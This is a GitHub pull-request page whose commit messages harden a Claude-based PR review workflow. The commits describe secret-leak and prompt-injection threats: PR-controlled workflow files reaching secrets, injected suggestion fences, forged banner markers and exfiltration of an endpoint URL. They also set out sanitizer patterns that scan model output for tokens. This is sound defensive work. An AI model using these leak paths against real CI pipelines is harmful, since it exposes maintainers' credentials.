3. Nit-2 -- Materialize step now jq -e gates $PAYLOAD before writing.

   claude-code-action's --json-schema covers this today, but if the action
   ever silently degrades (e.g. emits prose-wrapped JSON), $PAYLOAD could be
   non-empty yet unparseable. The sanitizer's `jq -e .` would still catch it
   one step later, but failing here gives a clearer error message
   ("structured_output is not valid JSON") and keeps the failure attributed
   to the right step. Pure defense-in-depth.

4. Nit on "write" vs "triage or higher" wording (correctness).

   GitHub's permission model lets triage role apply labels. Updated both the
   workflow header comment and the review job's `if:`-block comment to read
   "triage permission or higher" instead of "write permission". The trust
   model is unchanged -- triage+ is still a privileged role -- but the
   wording now matches GitHub's actual permission semantics.

5. Low-2 -- public-repo assumption documented.

   Added a comment on the overlay step explaining that
   `git fetch --depth=1 origin` works without credentials only because
   rocMLIR is public; if this workflow is ever ported to a private fork it
   will need a token. Pure documentation; no code change.

Skipped with rationale:

- Low-1 (`/tmp/inline_err`/`thread_err`/`summary_err` deterministic):
  Reviewer rated as "non-issue on GitHub-hosted runners". We run on
  ubuntu-latest. Switching to mktemp would add boilerplate (mktemp + rm/trap)
  for zero benefit on hosted runners; not worth the complexity.

- Nit-1 (concurrency group key):
  Reviewer confirmed safe (PR_NUMBER is always a numeric type from either the
  pull_request payload or the workflow_dispatch input). No change needed.

- Nit-3 (id-token: write removal worth a comment):
  Already documented at the permissions block (lines 91-93 in the review
  job).

Verified locally:
- python3 yaml.safe_load on the workflow + assertion of the new invariants
  (checkout ref expression, persist-credentials false, gh pr checks no
  longer has 2>/dev/null, locked_sha jq override present, materialize step
  has `jq -e .`).
- bash -n on all three remaining scripts (post / sanitize / patterns).
- headRefOid override smoke test: starting meta.json without headRefOid +
  jq override produces the locked SHA in the field the post job reads.
- Materialize jq -e gate smoke test: empty payload rejected by existence
  check, prose-wrapped "here is the response: {...}" rejected by the new jq
  gate, valid JSON accepted.

Co-authored-by: Cursor <cursoragent@cursor.com>
…ot] ref

Two follow-up review items addressed.

1. Major -- diff.patch was racy with mid-run force-pushes.

   The previous commit pinned actions/checkout to
   github.event.pull_request.head.sha so files and headRefOid both reference
   the labeler-approved SHA. But the pre-fetch step still ran
   `gh pr diff "$PR_NUMBER"`, which queries the GitHub API for the *current*
   PR head -- if the author force-pushes between checkout and pre-fetch,
   Claude reviews SHA1's files (what's in the working tree) but is handed
   SHA2's diff. Inline findings would be anchored to the wrong SHA, and
   line numbers in the diff would not match the source files Claude is
   reading.

   Fix generates the diff locally from what we actually checked out:
     base_ref=$(jq -r .baseRefName /tmp/pr/meta.json)
     git fetch --no-tags origin "$base_ref"
     git diff "origin/${base_ref}...HEAD" > /tmp/pr/diff.patch
   Three-dot syntax mirrors GitHub's "Files changed" view ("what HEAD has
   that the merge-base with base does not"). HEAD is locked to the SHA-
   pinned checkout, so the diff is provably the diff of the SHA we
   reviewed regardless of any in-flight force-push.

   Two supporting changes were needed for merge-base to be reliably
   computable:

     (a) actions/checkout: add `fetch-depth: 0` so HEAD's full ancestry
         comes down. The default fetch-depth: 1 would leave us with a
         shallow clone where the three-dot diff cannot resolve merge-base.
         Cost is one full clone per review (vs. shallow); acceptable for
         a per-PR workflow.

     (b) Overlay step: drop `--depth=1` from
         `git fetch origin "${DEFAULT_BRANCH}"`. With fetch-depth: 0 on
         checkout the clone is uniformly non-shallow; adding a
         `--depth=1` ref here would re-introduce a shallow boundary on
         origin/<default> via .git/shallow, which then breaks the pre-
         fetch step's three-dot diff when base == default. Full-depth
         fetch keeps the clone uniformly non-shallow.

2. Minor -- stale claude[bot] reference in review-rocmlir-pr SKILL.md.

   Lines 240-242 referred to `prev_comments.json` "containing prior
   `claude[bot]` root comments" as the trigger for `update-pr-review`.
   The earlier commit (c1cf825) switched the workflow + the update-pr-
   review skill to filter on `github-actions[bot]` AND a hidden
   `<!-- claude-pr-review-marker:v1 -->` body marker, but missed this
   cross-reference. Updated to match, including a note that this
   pipeline never authors comments as `claude[bot]` (no Anthropic OIDC
   exchange) so the marker filter is the canonical detection.

   Verified `rg 'claude\[bot\]'` shows only intentional "do NOT match"
   guards remain.

Verified locally:
- python3 yaml.safe_load on the workflow + assertion of new invariants:
  checkout has fetch-depth: 0, overlay has no `--depth` flag in actual
  commands (only inside comment text), pre-fetch no longer invokes
  `gh pr diff` and does invoke `git diff "origin/<base>...HEAD"`.
- bash -n on all three scripts.
- End-to-end smoke of the new diff command on this very repo: from
  HEAD = a91b72b on wf/claude-pr-review:
    git fetch --no-tags origin develop
    git diff "origin/develop...HEAD" --stat
  produces exactly the 7 files this branch touched, with merge-base ==
  origin/develop (b9d0687), confirming three-dot semantics work
  correctly on a SHA-pinned checkout after a fresh base fetch.

Co-authored-by: Cursor <cursoragent@cursor.com>
@umangyadav umangyadav requested a review from Copilot May 15, 2026 18:23
@umangyadav umangyadav marked this pull request as ready for review May 15, 2026 18:23
@umangyadav umangyadav requested a review from causten as a code owner May 15, 2026 18:23
@umangyadav umangyadav requested a review from justinrosner May 15, 2026 18:28
Copy link
Copy Markdown
Contributor

Copilot AI left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Pull request overview

Copilot reviewed 6 out of 7 changed files in this pull request and generated 8 comments.

Comment thread .github/workflows/claude_auto_review.yml
Comment thread .claude/skills/update-pr-review/SKILL.md
Comment thread .claude/skills/update-pr-review/SKILL.md Outdated
Comment thread .github/scripts/post_claude_review.sh
Comment thread .claude/skills/review-rocmlir-pr/SKILL.md Outdated
Comment thread .github/scripts/sanitize_claude_actions.sh Outdated
Comment thread .claude/skills/review-rocmlir-pr/SKILL.md Outdated
Comment thread .github/workflows/claude_auto_review.yml
umangyadav and others added 8 commits May 15, 2026 18:31
…t-suggestion button

Adds an optional `suggestion` field to inline_comments. When Claude is
confident in a verbatim single-line replacement, the post script wraps
it in a fenced ```suggestion block at the bottom of the comment body.
GitHub renders this as a "Commit suggestion" button so reviewers can
apply Claude's fix with one click.

v1 is single-line replacements only -- no `start_line`/`start_side`
multi-line range support. Rationale: the vast majority of LLVM/MLIR
style fixes worth suggesting are single-line (use SmallVector here, use
llvm::sort here, ++i instead of i++, missing auto&, C-style cast ->
static_cast, etc.). Multi-line ranges add a conditional gh-args branch
and a second consistency check in the sanitizer for marginal value;
they can be added later if the use case appears.

Schema (--json-schema in claude_auto_review.yml):
  inline_comments[].suggestion?: { type: string, minLength: 1 }
The action rejects empty or wrong-type values upstream; sanitizer covers
size + secret-pattern.

Skill contract (review-rocmlir-pr/SKILL.md):
  1. Single line only. Replaces exactly the line at `line` on `side`.
  2. Verbatim, with correct indentation -- GitHub commits the bytes
     into the file as-is.
  3. Self-contained -- must fully address the finding without edits
     elsewhere (no "and also add this #include" suggestions).
  4. High confidence only -- a wrong suggestion is worse than no
     suggestion because the dev might click-commit it and ship a bug.
     Skill enumerates good cases (std::vector -> SmallVector, std::sort
     -> llvm::sort, i++ -> ++i, missing static, C-style cast ->
     static_cast, missing auto&) and skip cases (needs new #include,
     multi-line, ambiguous).

update-pr-review/SKILL.md says "pass suggestion through unchanged from
fresh findings; reconciliation skill never adds or modifies it" --
keeps the contract for when a suggestion is appropriate concentrated
in one place (the review skill).

Post script (post_claude_review.sh):
  body = jq -r .body
  suggestion = jq -r .suggestion // empty
  if suggestion non-empty:
    body += "\n\n```suggestion\n" + suggestion + "\n```"
  body = with_marker(body)
The fenced block sits BEFORE the marker so re-review detection still
finds the marker as the body's last token.

Sanitizer (sanitize_claude_actions.sh):
- Per-body 8 KiB cap now also covers inline_comments[].suggestion (the
  suggestion is concatenated into the body before posting, so an
  oversized suggestion would bloat the resulting PR comment past what
  GitHub will accept).
- Secret-pattern scan and env-var-name scan already walk every string
  via `[.. | strings]`, so they cover suggestions automatically with
  no code change.

Verified:
- python3 yaml.safe_load + json.loads of the embedded --json-schema:
  suggestion present in inline_comments item properties as
  {type:string, minLength:1}, NOT in required.
- bash -n clean on all three scripts.
- Sanitizer fixtures (6/6 pass):
  * with_suggestion.json (good)                        -> exit 0
  * no_suggestion.json (back-compat)                   -> exit 0
  * leak_in_suggestion.json (ghs_* token)              -> exit 2
  * envname_in_suggestion.json (LLM_GATEWAY_KEY)       -> exit 2
  * oversize_suggestion.json (9 KiB > 8 KiB cap)       -> exit 3
  * empty_suggestion.json (sanitizer accepts; the
    action's --json-schema minLength:1 catches upstream) -> exit 0
- Body construction smoke test: body + blank line + fenced suggestion
  + blank line + marker, marker remains the last token (re-review
  detection unaffected).

Co-authored-by: Cursor <cursoragent@cursor.com>
The previous commit added inline code suggestions but only documented the
single-line contract in the skill prose -- nothing rejected a suggestion
containing a newline or a triple-backtick. That allowed two failure modes:

  - LF/CR in suggestion: post_claude_review.sh wraps it as
        ```suggestion
        line1
        line2
        ```
    GitHub renders this as a multi-line "Commit suggestion", but our API
    call only passes `line` / `side` (no start_line / start_side), so the
    REST endpoint replaces only the SINGLE line at `line` with all of the
    multi-line content. Almost certainly not what the developer wants when
    they click "Commit suggestion" -- a quiet correctness bug, not a
    workflow failure.

  - Triple-backtick in suggestion: closes the wrapping ```suggestion
    fence early and the remainder of the suggestion renders as ordinary
    comment text (or worse, opens a new fence with an arbitrary language
    tag from whatever follows). Either way the rendered comment doesn't
    match what Claude intended to suggest.

Two-layer fix:

1. JSON Schema (--json-schema in claude_auto_review.yml):
     "suggestion": {
       "type": "string",
       "minLength": 1,
       "pattern": "^[^\\r\\n]*$"
     }
   The action validates the model's response upstream, so a multi-line
   suggestion fails fast with a schema validation error rather than
   reaching our sanitizer. Triple-backtick is intentionally NOT in the
   pattern -- a "no triple-backtick" rule needs lookaround, which JSON
   Schema validators support inconsistently. The sanitizer covers it.

2. Sanitizer (sanitize_claude_actions.sh):
     bad_suggestion=$(jq -r '
       [.inline_comments[]?.suggestion // empty]
       | map(select(test("[\r\n]") or contains("```")))
       | length
     ' "$ACTIONS_FILE")
     if (( bad_suggestion > 0 )); then exit 1; fi
   This is the bulletproof gate -- runs in our trusted code path before
   the artifact is uploaded, catches both LF/CR (overlap with the schema
   for defense-in-depth) and triple-backtick (the case the schema can't
   easily express).

Skill (review-rocmlir-pr/SKILL.md):
   Updated the "single line only" rule to explicitly call out that the
   schema's `pattern` AND the workflow's sanitizer both reject any
   suggestion containing LF/CR or triple-backtick. A violating payload
   fails the workflow (visible error) rather than producing a broken
   comment (silent corruption). This makes the contract concrete for
   the model to reason about, and tells future maintainers where the
   enforcement lives.

Verified:
- python3 yaml.safe_load + json.loads of the embedded --json-schema; the
  pattern parses correctly to ^[^\r\n]*$ and re.compile()ing it against
  Python strings:
    "  SmallVector<int64_t, 4> indices;"  -> matches (good)
    "a\nb"                                -> rejects
    "a\rb"                                -> rejects
    "a```b"                               -> matches (sanitizer catches this)
- bash -n on all three remaining scripts.
- Sanitizer fixtures (7/7 pass):
  * good_single_line.json                       -> exit 0
  * multiline_lf.json (real "\n" in string)     -> exit 1 (single-line)
  * multiline_cr.json (real "\r" in string)     -> exit 1 (single-line)
  * backtick.json (literal "```" in string)     -> exit 1 (single-line)
  * no_suggestion.json (back-compat)            -> exit 0
  * leak_in_suggestion.json (ghs_* token)       -> exit 2 (secret)
  * oversize.json (9 KiB > 8 KiB cap)           -> exit 3 (size)

Net diff: +34 / -2 across 3 files.

Co-authored-by: Cursor <cursoragent@cursor.com>
Review feedback (Nit-3) flagged a small documentation drift in
sanitize_claude_actions.sh: the cap comment said "an oversized suggestion
would bloat the resulting PR comment", which implied we cap to prevent
the combined posted body from being oversized. We don't -- we cap each
of .summary / inline_comments[].body / inline_comments[].suggestion /
thread_updates[].body INDIVIDUALLY at MAX_BODY_BYTES (8 KiB). Worst-case
posted body is body + framing + suggestion + marker = ~2x the per-string
cap (~16 KiB at 8 KiB), which is well inside GitHub's ~65 KiB PR-comment
limit, so the per-string cap dominates in practice.

This commit only updates the comment + reword the error message
("body field(s)" -> "string field(s)") to match what's actually checked.
Behavior is unchanged.

Reviewer Nit-1 (suggestion newlines not enforced) and Nit-2 (closing-
fence backticks inside suggestion) are NOT addressed here because they
were already addressed in the prior commit d037993, which both
added a JSON Schema pattern (^[^\r\n]*$) on the action's side and a
sanitizer check that rejects suggestion strings matching test("[\r\n]")
or contains("```"). Reviewer was looking at a snapshot from before that
commit. No action needed.

Verified:
- bash -n on sanitize_claude_actions.sh.
- Fixture battery (4/4 unchanged outcomes):
    oversize.json (>8 KiB suggestion)              -> exit 3 (with the
                                                      reworded "string
                                                      field(s)" message)
    lf.json (suggestion contains "\n")             -> exit 1 (single-line)
    bt.json (suggestion contains literal "```")    -> exit 1 (single-line)
    good.json (single-line suggestion)             -> exit 0

Co-authored-by: Cursor <cursoragent@cursor.com>
pull_request_target's "checkout PR HEAD with secrets in env" pattern is
the root cause of a long string of LLM-on-PR CVEs. We don't actually
need its headline feature (giving fork PRs access to repo secrets)
because the workflow's contract is "internal contributors only".

Changes: - on: pull_request_target -> on: pull_request (still types: [labeled])
  - Both gating jobs (review, cleanup) add an explicit same-repo check
    (head.repo.full_name == repository) so fork PRs are a clean no-op
    instead of "ran but failed at the API-key step". workflow_dispatch
    remains a fork-PR escape hatch for maintainer-driven reviews.
  - Header rewritten to document the new design and the trade-offs we
    accept (workflow file now read from PR HEAD, overlay step demoted
    from hard boundary to defense-in-depth) and to enumerate the
    hardening that carries over unchanged (SHA-pinned checkout,
    persist-credentials: false, two-job split, sanitizer/schema/caps,
    concurrency).
  - Overlay step's threat-model comment updated to be honest about its
    weaker guarantee under pull_request.
Co-authored-by: Cursor <cursoragent@cursor.com>
The new pull_request trigger in claude_auto_review.yml causes the
review/post/cleanup jobs to skip silently for fork PRs (the same-repo
gate rules them out). That's correct security behavior, but the
maintainer who applied the label is left wondering why nothing
happened.

Add claude_auto_review_fork_notify.yml as a companion that fires on
the same labeled event via pull_request_target and posts a single
explanatory comment + removes the label. pull_request_target is safe
in this file specifically because there is NO actions/checkout step,
no PR-author-controlled string is interpolated into the shell or the
comment body, and the only commands run are gh pr comment (with a
hardcoded body) and gh api -X DELETE (against a hardcoded label
name).

Hardening:
  - Workflow-level permissions: {} (default-deny); job-level
    pull-requests: write only.
  - concurrency cancel-in-progress on PR number, so rapid label
    toggles collapse to (in the common case) a single notice for the
    settled label state.
  - Comment-then-removal ordering with explicit exit-code capture:
    the label is removed even when the comment fails, so the
    maintainer can always retry by re-labeling. Verified against
    both happy-path and gh-pr-comment-failure scenarios with a
    mock-gh harness.

Also updates the main workflow's header and review-job if: comment
to reference the companion file, so a future bisector or reader
sees both pieces of the integration committed atomically.

Co-authored-by: Cursor <cursoragent@cursor.com>
Three changes from PR review, plus a CODEOWNERS update. All three
review comments were valid; the Critical one in particular pointed
out that my earlier header comment had the threat model wrong.

Major 1 -- Pin post-job checkout to default branch
  Under pull_request, actions/checkout defaults to refs/pull/N/merge
  when no ref is given. That means the post job was loading
  .github/scripts/post_claude_review.sh from the PR's merge ref, then
  running it with pull-requests: write -- a PR-controlled script could
  post arbitrary comments / set arbitrary labels. Pin explicitly to
  github.event.repository.default_branch so the post script's
  provenance is always the trusted, code-owner-approved version.

Major 2 -- Cleanup label removal: permissions + selective error handling
  Per GitHub REST docs, the /repos/.../issues/N/labels/{name} endpoint
  is on the issues path because "PRs are issues" in GitHub's data
  model -- it requires `issues: write`, NOT `pull-requests: write`.
  Without that permission the DELETE silently 403'd and `|| true`
  swallowed the failure, leaving the label stuck and blocking
  re-trigger. Add `issues: write` to both the cleanup job and the
  fork-notify workflow's job, and replace `|| true` with selective
  404 handling: 404 (label already absent) is the expected no-op,
  any other failure surfaces as a job failure (cleanup) or workflow
  warning (fork-notify, where comment success is the primary signal).
  Verified end-to-end against {ok, 404, auth_fail} x {comment_ok,
  comment_fail} scenarios with a mock-gh harness.

Critical -- Restate the threat model honestly + add Layer-3 guard
  My earlier header claimed "PR authors with write access already
  have push access to develop, so modifying the workflow file in a
  PR is not a new privilege." This was wrong on two counts:
    * Branch protection on develop typically blocks direct push even
      for write-access users; pushing to a feature branch is a
      strictly weaker bar.
    * The label-apply trigger requires `triage`, which is strictly
      weaker than `write`. So the attack chain only needs the
      workflow modifier and the label applier to be different
      lower-privilege users, neither of whom alone could leak
      secrets under the prior pull_request_target design.
  Switching to pull_request opened a CVE class -- "PR-controlled
  workflow file with secrets in env" -- that is fundamentally not
  mitigatable from inside the workflow.

  Decision: keep pull_request, mitigate externally + procedurally.
  This commit lands the in-workflow + documentation pieces:

    1. Rewritten SECURITY MODEL header that:
       - Drops the incorrect claim about develop push access.
       - Documents the residual risk explicitly.
       - Lays out the three mandatory mitigation layers (repo
         configuration, maintainer procedure, in-workflow
         defense-in-depth) and which threats each layer actually
         covers (and which it doesn't).

    2. New "Layer 3" review-job step that hard-fails the run if the
       PR's diff against base touches .github/workflows/,
       .github/scripts/, or .claude/. Defense-in-depth -- catches
       accidental modifications by legitimate contributors and
       raises the bar for unsophisticated attackers; cannot defeat
       a sophisticated attacker (who can simply remove the step from
       their PR-controlled workflow), so the layered story still
       hinges on the maintainer procedure. Skipped on
       workflow_dispatch (which uses the trusted develop workflow).
       Verified against clean / perimeter-only / mixed PR diffs.

    3. CODEOWNERS: added explicit entries for .github/workflows/,
       .github/scripts/, and .claude/. Functionally redundant with
       the existing wildcard but makes the security perimeter
       inspectable and provides the obvious place to add additional
       reviewers (e.g. a security team) later.

  Required out-of-band work documented in the workflow header (must
  be done by a repo admin):
    - Branch protection on develop must require code-owner review
      and prohibit direct pushes (even for admins).
    - Settings -> Actions -> General -> "Require approval for all
      outside collaborators".

Co-authored-by: Cursor <cursoragent@cursor.com>
Companion workflow to make Layer 2 of the security model (maintainer
procedure: audit perimeter modifications before applying claude-review)
materially more robust by surfacing perimeter modifications visually
in the PR's labelset and as a top-level banner comment, instead of
relying on the maintainer to spot them in the file diff.

claude_auto_review_perimeter_banner.yml:
  - Trigger: pull_request_target on opened / synchronize / reopened.
    Runs on every PR push, including from forks (we need fork PRs to
    get the banner too).
  - For each event, queries the GitHub API for the changed-file list
    (no checkout, no PR code execution -- safe pull_request_target
    pattern, same as claude_auto_review_fork_notify.yml). Filters to
    the perimeter regex (.github/workflows/, .github/scripts/, .claude/).
  - If the perimeter is touched:
      * `gh label create --force` ensures the modifies-ci-paths label
        exists (upsert; idempotent).
      * `gh pr edit --add-label modifies-ci-paths` (idempotent).
      * Checks for an existing banner via a hidden HTML marker
        (<!-- claude-perimeter-banner:v1 -->); posts the banner only
        if not already present. Marker version can be bumped to force
        a re-post if the banner template changes.
  - If the perimeter is NOT touched: removes the modifies-ci-paths
    label if present (so the labelset stays accurate after a fix-up
    push). The historical banner comment is left in place.
  - Permissions: pull-requests: write + issues: write only. Workflow-
    level permissions: {} (default-deny); concurrency cancel-in-progress
    keyed on PR number.
  - Heredoc-rendered banner body: hardcoded text plus the perimeter-
    changed file paths interpolated via printf (output treated as
    literal text by the heredoc, never re-evaluated as shell). Visual
    body verified against a realistic perimeter+legitimate file mix.

Behavioral verification (mock-gh harness, four scenarios):
  A. Clean PR; stale label present       -> remove label, log it
  B. Clean PR; no stale label            -> attempt remove (no-op),
                                            log "nothing to do"
  C. Perimeter touched; no prior banner  -> label_create + add_label
                                            + list_comments + post
  D. Perimeter touched; banner present   -> label_create + add_label
                                            + list_comments (find
                                            existing) + skip post
All four pass; op order and stdout messages match expectations.

Companion to:
  - claude_auto_review.yml (main; runs claude-code-action on label /
    dispatch). Header updated to reference this companion in the
    Layer 2 documentation.
  - claude_auto_review_fork_notify.yml (notifies fork PRs that the
    label flow doesn't apply to them).

Notes: - PERIMETER_REGEX duplicated between this file and the Layer-3
    perimeter-block step in claude_auto_review.yml. Comment in both
    places notes they must stay in sync.
  - The marker version (v1) lets us force a banner re-post on existing
    PRs by bumping it if we ever rewrite the banner text.
Co-authored-by: Cursor <cursoragent@cursor.com>
Nit-1: drop pull-requests:write from cleanup job
  The job's only step is a label DELETE on the /issues/.../labels/{name}
  endpoint, which requires issues:write (PRs are issues in GitHub's
  data model -- "shared" actions like labels live on the issues
  endpoints per the REST docs). pull-requests:write was being carried
  speculatively for "future cleanup steps"; least-privilege says don't.
  If a future step needs it, adding the line back with a clear
  motivation is trivial.

Nit-2: Layer-3 perimeter check now diffs against default branch, not
       PR base
  Renamed env var BASE_REF -> DEFAULT_BRANCH and switched the diff
  baseline from `github.event.pull_request.base.ref` to
  `github.event.repository.default_branch`.

  Rationale: the whole point of the Layer-3 guard is "the workflow
  about to run with secrets differs from the trusted dispatch-time
  version". Dispatch runs from the default branch regardless of what
  the PR's base is, so the diff baseline must also be the default
  branch. In the common case (PR targets develop) this is identical
  to the old behavior. The behavior change only matters for PRs
  targeting release branches whose perimeter has diverged from
  develop -- previously such PRs could slip past Layer 3 even though
  the workflow about to run differed from the trusted baseline; they
  now correctly fire and force the maintainer through workflow_dispatch.

Verified: - YAML parse + permissions check (cleanup has only issues:write).
  - Layer-3 env now contains only DEFAULT_BRANCH (no BASE_REF).
  - Behavioral re-test, four scenarios in throwaway git repos:
      1. PR targets develop, clean      -> pass
      2. PR targets develop, perimeter  -> blocked
      3. PR targets release/v2 with     -> blocked (NEW: this case
         release-side perimeter            previously slipped past
         divergence, PR itself clean       the guard)
      4. PR targets release/v2, no      -> pass
         perimeter divergence
Co-authored-by: Cursor <cursoragent@cursor.com>
umangyadav and others added 4 commits May 15, 2026 19:52
Two Major fixes from PR review.

Major 1 -- Snapshot PR-side perimeter files for dispatch reviews

The review job overlays .claude/ and .github/scripts/ from the default
branch before claude-code-action runs. That overlay is correct (and
necessary) for runtime safety: the Skill tool reads from the workspace
.claude/skills/, the sanitizer is invoked from .github/scripts/, and
neither should ever execute the PR's proposed version of those files.

But the workflow header recommends workflow_dispatch as the escape
hatch precisely for PRs that legitimately modify those paths -- and
under the prior implementation the dispatch path's review was
incomplete: Read on .claude/skills/foo.md after the overlay returned
the trusted develop version, not the PR's proposed version. diff.patch
showed the changes but Claude couldn't read the post-change file
content for context, silently producing an inaccurate review.

Fix: snapshot-before-overlay. A new step copies workspace .claude/
and .github/scripts/ to /tmp/pr-source/ BEFORE the overlay restores
the trusted versions. The review-rocmlir-pr SKILL is documented to
consult /tmp/pr-source/<path> when diff.patch shows changes under
the overlay-targeted paths. Workspace runtime path is unchanged
(still trusted overlay version); review-side Read path now has
fidelity to the PR.

Step ordering: Layer-3 -> Snapshot -> Overlay. Under pull_request
the snapshot only ever captures unchanged perimeter files (Layer-3
already failed any perimeter PR by then), so the snapshot has zero
overhead and zero security impact for the label-trigger path. Under
workflow_dispatch (Layer-3 skipped) the snapshot is the mechanism
that makes the dispatch escape hatch actually work for perimeter PRs.

Verified against four scenarios in throwaway workspaces:
  A. workspace has no perimeter paths        -> empty snapshot
  B. workspace has .claude/ only              -> only .claude/ captured
  C. workspace has .claude/ AND scripts/      -> both captured
  D. content fidelity (exact PR-side bytes)   -> byte-for-byte match

Also updated:
  - SKILL.md (review-rocmlir-pr): new "Special case: changes under
    .claude/ or .github/scripts/" subsection in Step 1, with a path
    table mapping workspace paths to /tmp/pr-source paths.
  - workflow header (Layer 2 dispatch advice): now describes the
    snapshot mechanism explicitly so a reader doesn't have to guess
    why dispatch on a perimeter PR works.

Major 2 -- Fork-notify: honest label-state comment + loud failure

The previous fork-notify shell ran:
    1. post comment claiming "label has been removed"
    2. attempt label DELETE
    3. on non-404 DELETE failure, emit ::warning::, exit 0
This combined the worst possible outcome of "delete failed AND
comment lied AND job green" into a likely silent failure mode.

Restructure to delete-first / compose-then-post / fail-loud:
  1. Try to DELETE the label, classify result as one of:
       removed   -- API returned success
       absent    -- API returned 404 (was already gone; same user
                    guarantee as removed)
       failed    -- any other failure (auth, rate limit, network)
  2. Compose the label-status sentence in the comment body to
     reflect the actual state. The "failed" branch tells the
     maintainer to remove the label manually before retrying and
     points at the workflow run logs for the underlying error.
  3. Post the comment.
  4. Exit non-zero if EITHER the delete failed OR the comment failed,
     emitting ::error:: annotations for whichever step(s) failed so
     the run summary surfaces the actionable items.

Verified against all 6 (delete_state x comment_state) combinations
with a mock-gh harness:
  removed + ok       -> exit 0, "has been removed" in body
  absent  + ok       -> exit 0, "is not currently applied" in body
  failed  + ok       -> exit 1, "Automatic removal FAILED" in body,
                       ::error::Failed to remove
  removed + comment_fail -> exit 1, ::error::Failed to post
  absent  + comment_fail -> exit 1, ::error::Failed to post
  failed  + comment_fail -> exit 1, both ::error:: annotations

The "comment lies + label stuck + run green" failure mode is
mechanically eliminated.

Co-authored-by: Cursor <cursoragent@cursor.com>
Major: the duplicate-banner check filtered comments by marker text only.
A PR commenter could include `<!-- claude-perimeter-banner:v1 -->` in a
regular comment to silently suppress the warning banner on subsequent
perimeter-touching pushes. Now require both author == github-actions[bot]
AND body contains marker; user.login is server-determined from the
comment's auth token, so a PR author cannot impersonate the bot.

Minor: PR-controlled filenames were rendered inside a markdown fence,
so a path containing a backtick or triple-backtick could break the fence
and inject attacker-controlled markdown into a github-actions[bot]
comment. Now rendered as a markdown bullet list with each filename in
inline-code, backticks stripped from filename interiors, and capped at
50 entries with an overflow indicator to prevent unbounded comment size.

Co-authored-by: Cursor <cursoragent@cursor.com>
…IGPIPE

Major (sanitizer): the structured inline_comments[].suggestion field had
single-line / no-fence enforcement, but the prose body fields did not. A
model emitting a raw ```suggestion fence inside .summary,
.inline_comments[].body, or .thread_updates[].body would render in
GitHub as a one-click "Commit suggestion" UI carrying attacker-controlled
bytes, bypassing every part of the structured-suggestion contract. Add a
sanitizer check that splits each body field on newlines and rejects any
line matching `^[ \t]*` + `\`{3,}` + `[ \t]*suggestion[ \t]*$` -- catches
3+ backtick fences with optional surrounding whitespace, the forms
GitHub renders. Update review-rocmlir-pr SKILL.md so the model knows to
keep suggestion fences out of prose fields and use a different language
tag (e.g. ```cpp) when only displaying code.

Major (banner): `printf "$perimeter" | head -n 50 | sed ...` ran under
`set -euo pipefail`. With a pathological (large) perimeter list, head
closes the pipe after 50 lines, printf gets SIGPIPE on its next write
and exits 141, pipefail fails the pipeline, and the step exits before
the banner is posted -- silently dropping the warning. Replaced with a
single awk pass (`length($0) > 0 { n++; if (n <= 50) ... }`) that
reads stdin to EOF and never closes early, so the pipeline succeeds
under pipefail regardless of input size. Empirically: old pipeline
exits 141 on a 5000-line input; new pipeline exits 0, renders 50
lines + the overflow note. Added a NOTE comment explaining the
failure mode so future contributors don't reintroduce a head -n N here.

Co-authored-by: Cursor <cursoragent@cursor.com>
…eta)

Valid fixes:

- update-pr-review SKILL.md: track Claude's own marker-tagged replies
  (`claude_replies`, `latest_reply_is_claude`) and gate the resolve/
  clarify emit on "is the latest reply on the thread already ours?".
  Without the gate, every re-review re-emitted resolve/clarify on
  still-fixed/still-clarified threads, posting duplicate replies on
  every rerun.

- post_claude_review.sh: narrow the 422-as-warning suppression to ONLY
  the "line not part of the diff" case (HTTP 422 AND error body
  matches "part of the diff" / variants). Other 422s (invalid commit_id,
  abuse rate-limit, schema errors) and all other non-2xx now set
  HAD_FAILURE so the job fails visibly rather than silently dropping
  real findings.

- sanitize_claude_actions.sh:
  * `length` -> `utf8bytelength` for the per-string byte cap. jq's
    `length` counts code points; we want bytes-on-the-wire after UTF-8
    encoding so multi-byte content (CJK, emoji, accented Latin in code
    quotes) cannot pass an N-codepoint check while exceeding N bytes
    downstream.
  * Redact the env-var-name preview the same way the credential-pattern
    preview is redacted. The matched line could include the env var's
    value (e.g. `ANTHROPIC_BASE_URL=https://...`) and printing it
    verbatim into the GHA log would defeat the secret protection.
  * New scan for the LITERAL `ANTHROPIC_BASE_URL` value (passed via
    env from the workflow). The env-var-NAME scan misses an exfil that
    leaks the URL by VALUE alone without ever mentioning the variable
    name. Match is reported with full redaction so the URL never lands
    in the log.

- claude_auto_review.yml:
  * `--json-schema`: drop `LEFT` from the inline_comments[].side enum.
    GitHub's review-comment API uses base-file line numbers for LEFT
    but the skill (and the diff context loaded into the prompt) is
    head-relative only -- a LEFT comment would either anchor wrong or
    422.
  * Sanitize step now exports `ANTHROPIC_BASE_URL` so the new URL-
    value scan can see it.

- review-rocmlir-pr SKILL.md:
  * Forbid `side: "LEFT"` in inline_comments; document why and tell
    Claude to use the nearest surviving RIGHT-side context line
    instead.
  * Fix the `llvm::sort` rationale: the LLVM coding standard exists
    because `llvm::sort` shuffles inputs under EXPENSIVE_CHECKS to
    surface order-dependent bugs, NOT because it makes equal elements
    deterministic (it doesn't -- `llvm::stable_sort` is the stable
    one). Old wording would have led the bot to file misleading
    "stability" findings.

Triaged (no code change; per-comment replies posted on the PR):

- meta.json mutability: invalid premise. Claude's --allowedTools is
  `Skill,Read,Grep,Glob` -- there is no Write tool, so the model
  cannot mutate /tmp/pr/meta.json from prompt injection.

- execlog sanitizer false-positives: invalid. The file
  sanitize_claude_execlog.sh was removed in commit 778ec92
  ("Simplify Claude review pipeline (Path A + structured outputs +
  drop execlog + concurrency)"); the comment was reviewing an
  obsolete state.

- "doc says Read/Grep/Glob but code allows Write": invalid. Code
  matches doc -- `--allowedTools "Skill,Read,Grep,Glob"` (no Write).

- PR description vs implementation mismatch: meta, belongs in the PR
  description, not in code.

- post job checkout pin: already fixed in 9102ef3 -- post job
  pins `ref: ${{ github.event.repository.default_branch }}` with
  sparse-checkout and persist-credentials: false.

Co-authored-by: Cursor <cursoragent@cursor.com>
Copy link
Copy Markdown
Contributor

Copilot AI left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Pull request overview

Copilot reviewed 9 out of 10 changed files in this pull request and generated 6 comments.

Comments suppressed due to low confidence (1)

.claude/skills/update-pr-review/SKILL.md:136

